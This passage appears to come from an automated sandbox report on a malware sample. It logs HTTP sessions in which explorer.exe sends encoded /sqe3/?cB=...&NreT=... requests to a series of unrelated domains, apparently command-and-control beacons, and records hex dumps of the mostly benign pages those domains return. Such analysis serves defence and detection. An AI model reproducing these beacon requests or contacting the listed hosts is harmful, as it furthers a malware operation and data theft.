22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f 73 76 67 Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><title>Sayfa bulunamad – Ziyade Pide & Kebap</title><link rel='dns-prefetch' href='//s.w.org' /><link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="Ziyade Pide & Kebap » beslemesi" href="https://www.nziyade.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Ziyade Pide & Kebap » yorum beslemesi" href="https://www.nziyade.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg
Nov 26, 2020 21:13:49.526608944 CET	510	IN	Data Raw: 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 Data Ascii: \/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.nziyade.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3"}};!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=
Nov 26, 2020 21:13:49.526648998 CET	511	IN	Data Raw: 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 69 5b 6f 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 Data Ascii: hingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything\|\|(n=function(){t.
Nov 26, 2020 21:13:49.526686907 CET	513	IN	Data Raw: 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 63 2d 62 6c 6f 63 6b 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 Data Ascii: 'stylesheet' id='wc-block-style-css' href='http://www.nziyade.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=3.6.0' type='text/css' media='all' /><link rel='stylesheet' id='cfc_style-css' href='https://ww

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49175	160.124.66.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:37.975326061 CET	618	OUT	GET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.yanasacha.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:38.257570982 CET	618	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Nov 2020 20:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.22	49176	52.58.78.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:43.320058107 CET	619	OUT	GET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.bigdillenergy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:43.336735964 CET	620	IN	HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Thu, 26 Nov 2020 20:14:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 31 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 67 64 69 6c 6c 65 6e 65 72 67 79 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 64 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 67 64 69 6c 6c 65 6e 65 72 67 79 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.bigdillenergy.com/' />a </head>9 <body>3d You are being redirected to http://www.bigdillenergy.coma </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	52.58.78.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:13:54.217690945 CET	514	OUT	GET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.coloringprintouts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:13:54.234344006 CET	514	IN	HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Thu, 26 Nov 2020 20:13:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 35 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 69 6e 67 70 72 69 6e 74 6f 75 74 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 31 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 69 6e 67 70 72 69 6e 74 6f 75 74 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>55 <meta http-equiv='refresh' content='5; url=http://www.coloringprintouts.com/' />a </head>9 <body>41 You are being redirected to http://www.coloringprintouts.coma </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	66.235.200.146	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:13:59.443011999 CET	515	OUT	GET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.ktproductreviews.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	188.93.150.44	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:05.591139078 CET	516	OUT	GET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.mondzorg-postma.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:05.615524054 CET	517	IN	HTTP/1.1 200 OK Date: Thu, 26 Nov 2020 20:14:05 GMT Server: Apache/2.4.10 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 Data Raw: 35 64 31 30 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 20 3c 74 69 74 6c 65 3e 44 6f 6d 65 69 6e 20 47 65 72 65 73 65 72 76 65 65 72 64 20 2d 20 4d 69 6a 6e 64 6f 6d 65 69 6e 2e 6e 6c 3c 2f 74 69 74 6c 65 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 33 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 3c 73 74 79 6c 65 3e 20 2a 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 7d 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 7d 20 2e 73 69 74 65 2d 66 72 61 6d 65 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 7d 20 2f 2a 20 54 79 70 65 20 73 74 79 6c 65 73 20 2a 2f 20 73 74 72 6f 6e 67 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 7d 20 2e 68 65 61 64 69 6e 67 2d 62 6c 6f 63 6b 20 7b 20 66 6f 6e 74 3a 20 37 30 30 20 33 32 70 78 2f 33 39 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 35 70 78 3b 20 7d 20 2e 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 20 7b 20 66 6f 6e 74 3a 20 37 30 30 20 32 30 70 78 2f 32 34 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 7d 20 2e 63 6f 70 79 2d 64 65 66 61 75 6c 74 20 7b 20 66 6f 6e 74 3a 20 33 30 30 20 31 36 70 78 2f 32 30 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 7d 20 2e 63 6f 70 79 2d 63 61 70 74 69 6f 6e 20 7b 20 66 6f 6e 74 3a 20 34 30 30 20 31 34 70 78 2f 31 38 70 78 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 20 2f 2a 20 45 6e 64 20 74 79 70 65 20 73 74 79 6c 65 73 20 2a 2f 20 2f 2a 20 42 75 74 74 6f 6e 20 73 74 Data Ascii: 5d101<!doctype html><html lang="nl"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Domein Gereserveerd - Mijndomein.nl</title> <link href="https://fonts.googleapis.com/css?family=Montserrat:300,400,700" rel="stylesheet"> <style> * { margin: 0; padding: 0; border: 0; } html, body { width: 100%; height: 100%; } .site-frame { max-width: 1120px; margin: 0 auto; position: relative; padding: 0 15px; -webkit-box-sizing: border-box; box-sizing: border-box; } /* Type styles / strong { font-weight: 700; } .heading-block { font: 700 32px/39px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 15px; } .heading-title { font: 700 20px/24px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 20px; } .copy-default { font: 300 16px/20px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 20px; } .copy-caption { font: 400 14px/18px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; margin: 0 0 15px; text-align: center; } / End type styles / / Button st
Nov 26, 2020 21:14:05.615550995 CET	519	IN	Data Raw: 79 6c 65 73 20 2a 2f 20 2e 62 74 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 35 41 36 32 33 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 20 70 61 64 64 69 6e 67 3a 20 39 70 78 20 32 30 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a Data Ascii: yles */ .btn { background: #F5A623; color: #FFF; padding: 9px 20px; border-radius: 3px; text-decoration: none; display: inline-block; font: 700 16px/20px 'Montserrat', Helvetica, Arial, Verdana, sans-serif; text-align: center; -webkit-box-sizi
Nov 26, 2020 21:14:05.615567923 CET	520	IN	Data Raw: 65 20 7b 20 74 6f 70 3a 20 31 32 30 70 78 3b 20 6c 65 66 74 3a 20 61 75 74 6f 3b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 20 74 72 61 6e 73 66 6f 72 Data Ascii: e { top: 120px; left: auto; -webkit-transform: none; -ms-transform: none; transform: none; } } .hero .image .site-frame .panel { max-width: 350px; background: #6B2FAD; padding: 35px; border-radius: 3px; } @media (max-width: 479px) { .hero .ima
Nov 26, 2020 21:14:05.615585089 CET	521	IN	Data Raw: 69 67 68 74 3a 20 32 30 70 78 3b 20 7d 20 2e 6e 6f 6e 2d 75 73 65 72 20 2e 63 6f 6c 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 20 7d 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 37 39 70 78 29 20 7b 20 2e Data Ascii: ight: 20px; } .non-user .col { padding-left: 20px; } @media (max-width: 479px) { .non-user { padding-top: 40px; padding-bottom: 40px; -webkit-box-orient: vertical; -webkit-box-direction: normal; -ms-flex-direction: column; flex-direction: colu
Nov 26, 2020 21:14:05.615602970 CET	523	IN	Data Raw: 75 74 2c 20 66 6f 6e 74 2d 73 69 7a 65 20 30 2e 31 35 73 20 65 61 73 65 2d 6f 75 74 3b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 Data Ascii: ut, font-size 0.15s ease-out; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); } .domain-widget form input[type=text]:focus+label, .domain-widget form input[type=text].is-filled+label { top: 20
Nov 26, 2020 21:14:05.615617990 CET	524	IN	Data Raw: 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 70 78 29 3b 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 70 78 29 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d Data Ascii: rm: translateY(-7px); -webkit-transform: translateY(-7px); transform: translateY(-7px); } } /* End Bounce animation */ </style> <script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVS
Nov 26, 2020 21:14:05.615637064 CET	525	IN	Data Raw: 72 28 76 61 6c 2e 6c 65 6e 67 74 68 20 2f 20 33 29 3b 20 63 6f 6e 73 74 20 73 74 61 72 74 20 3d 20 76 61 6c 2e 6c 65 6e 67 74 68 20 2d 20 28 63 6f 6d 6d 61 73 20 2a 20 33 29 3b 20 66 6f 72 20 28 76 61 72 20 6f 6f 20 3d 20 30 3b 20 6f 6f 20 3c 20 Data Ascii: r(val.length / 3); const start = val.length - (commas * 3); for (var oo = 0; oo < commas; oo++) { if (oo > 0) { newstr += '.' } newstr += val.substr(start + (oo * 3), 3); } if (start > 0) { newstr = val.substr(0, start) + '.' + val.substr(0, s
Nov 26, 2020 21:14:05.615667105 CET	527	IN	Data Raw: 32 37 2e 34 37 35 20 32 32 2e 33 35 35 2d 34 39 2e 39 31 20 34 39 2e 31 38 33 2d 34 39 2e 39 31 7a 4d 33 37 32 37 2e 35 39 32 20 35 39 38 2e 35 32 34 63 2d 31 33 2e 34 32 32 20 34 38 2e 32 34 39 2d 35 37 2e 35 38 36 20 38 38 2e 36 32 38 2d 31 32 Data Ascii: 27.475 22.355-49.91 49.183-49.91zM3727.592 598.524c-13.422 48.249-57.586 88.628-128.038 88.628-76.602 0-144.817-54.961-144.817-148.628 0-89.735 66.542-146.944 138.677-146.944 86.092 0 139.218 53.283 139.218 143.018 0 11.774-1.121 24.684-1.673
Nov 26, 2020 21:14:05.615683079 CET	528	IN	Data Raw: 20 30 2d 31 33 37 2e 35 34 35 2d 36 30 2e 35 37 37 2d 31 33 37 2e 35 34 35 2d 31 34 36 2e 33 37 39 20 30 2d 38 33 2e 30 31 37 20 35 35 2e 39 30 38 2d 31 34 35 2e 32 36 36 20 31 33 34 2e 37 34 2d 31 34 35 2e 32 36 36 20 34 37 2e 35 33 38 20 30 20 Data Ascii: 0-137.545-60.577-137.545-146.379 0-83.017 55.908-145.266 134.74-145.266 47.538 0 68.221 17.949 74.929 28.599v-149.176h83.884v356.137zM2442.563 608.629c32.989 0 62.616-23.559 62.616-69.543 0-46.56-29.627-68.983-62.616-68.983s-62.628 22.424-62.
Nov 26, 2020 21:14:05.615701914 CET	530	IN	Data Raw: 4d 31 37 33 33 2e 30 36 37 20 32 36 34 2e 38 33 63 32 37 2e 39 35 34 20 30 20 35 30 2e 33 33 32 20 32 32 2e 34 33 35 20 35 30 2e 33 33 32 20 34 39 2e 39 31 20 30 20 32 37 2e 34 38 36 2d 32 32 2e 33 37 38 20 34 39 2e 39 32 37 2d 35 30 2e 33 33 32 Data Ascii: M1733.067 264.83c27.954 0 50.332 22.435 50.332 49.91 0 27.486-22.378 49.927-50.332 49.927-26.839 0-49.205-22.441-49.205-49.927 0-27.475 22.367-49.91 49.205-49.91z"></path></svg> </a> </h1> <figure class="image"> <img src="data:image/jpeg;base6
Nov 26, 2020 21:14:05.637974024 CET	531	IN	Data Raw: 45 73 4a 71 35 5a 4a 4b 67 52 51 7a 49 75 58 4c 4a 71 75 68 41 41 55 51 56 41 45 46 41 68 43 68 43 45 4a 45 6f 69 49 69 47 58 57 53 31 4d 38 42 6c 75 55 64 43 62 55 53 46 55 53 77 74 4a 71 41 41 41 41 41 41 41 41 41 41 41 41 71 49 2f 4b 54 6e 73 Data Ascii: EsJq5ZJKgRQzIuXLJquhAAUQVAEFAhChCEJEoiIiGXWS1M8BluUdCbUSFUSwtJqAAAAAAAAAAAAqI/KTnsua0sSe+dWeklolhrPQ1nJFWNTqM1caNLE1RyKWd7dLEVxYZcbzZ6WG8yZ30+nGMtNu7MhbGUJzUssdlyx1nTLBRnNvENZ18uuzj3gZ9TlduGzN7GNwx2rixSau1iUtyMlczueXZ5hfUpjz162U5cWdNeilic3n06u

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49170	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:10.739721060 CET	603	OUT	GET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.cocogreensoil.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:10.893620014 CET	605	IN	HTTP/1.1 403 Forbidden Date: Thu, 26 Nov 2020 20:14:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 156 X-Sorting-Hat-ShopId: 49082073245 X-Dc: gcp-us-central1 X-Request-ID: 7477f6ab-95f2-4a58-8640-a3ddf41aad41 X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 06a7ca353d00000ea7272af000000001 Server: cloudflare CF-RAY: 5f8646352e050ea7-FRA Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style 